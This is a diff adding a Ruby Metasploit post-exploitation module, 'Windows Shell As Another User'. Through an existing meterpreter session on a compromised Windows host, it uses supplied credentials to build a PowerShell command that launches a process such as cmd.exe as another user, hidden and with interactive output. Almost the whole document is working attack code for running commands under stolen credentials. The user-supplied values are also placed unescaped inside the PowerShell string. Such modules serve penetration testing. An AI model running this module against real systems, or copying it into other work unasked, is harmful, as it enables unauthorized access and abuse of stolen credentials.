|
| 1 | +## |
| 2 | + # This module requires Metasploit: http://metasploit.com/download |
| 3 | + # Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'rex' |
| 8 | +require 'msf/core/post/windows/powershell' |
| 9 | + |
| 10 | +class MetasploitModule < Msf::Post |
| 11 | + include Msf::Post::Windows::Powershell |
| 12 | + def initialize(info={}) |
| 13 | + super( update_info( info, |
| 14 | + 'Name' => 'Windows Shell As Another User', |
| 15 | + 'Description' => %q{ This module will start a process as another user using powershell. }, |
| 16 | + 'License' => MSF_LICENSE, |
| 17 | + 'Author' => [ 'p3nt4' ], |
| 18 | + 'Platform' => [ 'win' ], |
| 19 | + 'SessionTypes' => [ 'meterpreter' ] |
| 20 | + )) |
| 21 | + register_options( |
| 22 | + [ |
| 23 | + OptString.new('USER', [true, 'User to run executable as', nil]), |
| 24 | + OptString.new('PASS', [true, 'Password of user', nil]), |
| 25 | + OptString.new('DOMAIN', [false, 'Domain of user', '']), |
| 26 | + OptString.new('EXE', [true, 'Executable to run', 'cmd.exe']), |
| 27 | + OptString.new('ARGS', [false, 'Arguments', nil]), |
| 28 | + OptString.new('PATH', [true, 'Working Directory', 'C:\\']), |
| 29 | + OptBool.new('CHANNELIZE', [true, 'Chanelize output, required for reading output or interracting', true]), |
| 30 | + OptBool.new('INTERACTIVE', [true, 'Run interactively', true]), |
| 31 | + OptBool.new('HIDDEN', [true, 'Hide the window', true]), |
| 32 | + #OptString.new('DUMMY', [false, 'Run in a dummy host process', '']), |
| 33 | + ], self.class) |
| 34 | + end |
| 35 | + |
| 36 | + def run |
| 37 | + begin |
| 38 | + raise "Powershell is required" if !have_powershell? |
| 39 | + #Variable Setup |
| 40 | + user=datastore['user'] |
| 41 | + pass=datastore['pass'] |
| 42 | + domain = datastore['domain'] |
| 43 | + exe=datastore['exe'].gsub("\\","\\\\\\\\") |
| 44 | + inter=datastore['interactive'] |
| 45 | + args=datastore['args'] |
| 46 | + path=datastore['path'].gsub("\\","\\\\\\\\") |
| 47 | + #dummy=datastore['dummy'] |
| 48 | + sessNo=datastore['session'] |
| 49 | + channelized = datastore['channelize'] |
| 50 | + hidden = datastore['hidden'] |
| 51 | + #Check if dession si interactive |
| 52 | + if (!session.interacting and inter) |
| 53 | + print_error("Interactive mode can only be used in a meterpreter console") |
| 54 | + print_error("Use 'run post/windows/manage/run_as_psh USER=x PASS=X EXE=X' or SET INTERACTIVE false") |
| 55 | + raise 'Invalide console' |
| 56 | + end |
| 57 | + scr="$pw = convertto-securestring '#{pass}' -asplaintext -force; " |
| 58 | + scr+="$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist '#{domain}\\\\#{user}',$pw; " |
| 59 | + scr+="Start-process '#{exe}' -WorkingDirectory '#{path}' -Credential $pp" |
| 60 | + if args and args!='' |
| 61 | + scr+=" -argumentlist '#{args}' " |
| 62 | + end |
| 63 | + if hidden |
| 64 | + print_status("Hidden mode may not work on older powershell versions, if it fails, try HIDDEN=false") |
| 65 | + scr+= " -WindowStyle hidden" |
| 66 | + end |
| 67 | + scr=" -c \"#{scr}\"" |
| 68 | + p = client.sys.process.execute("powershell.exe", scr, |
| 69 | + 'Channelized' => channelized, |
| 70 | + 'Desktop' => false, |
| 71 | + 'Session' => false, |
| 72 | + 'Hidden' => true, |
| 73 | + 'Interactive' => inter, |
| 74 | + 'InMemory' => nil, |
| 75 | + 'UseThreadToken' => false) |
| 76 | + print_status("Process #{p.pid} created.") |
| 77 | + print_status("Channel #{p.channel.cid} created.") if (p.channel) |
| 78 | + if (inter and p.channel) |
| 79 | + client.console.interact_with_channel(p.channel) |
| 80 | + elsif p.channel |
| 81 | + data = p.channel.read() |
| 82 | + print_line(data) if data |
| 83 | + end |
| 84 | + rescue ::Interrupt |
| 85 | + raise $! |
| 86 | + rescue ::Exception => e |
| 87 | + raise e |
| 88 | + end |
| 89 | + end |
| 90 | +end |
0 commit comments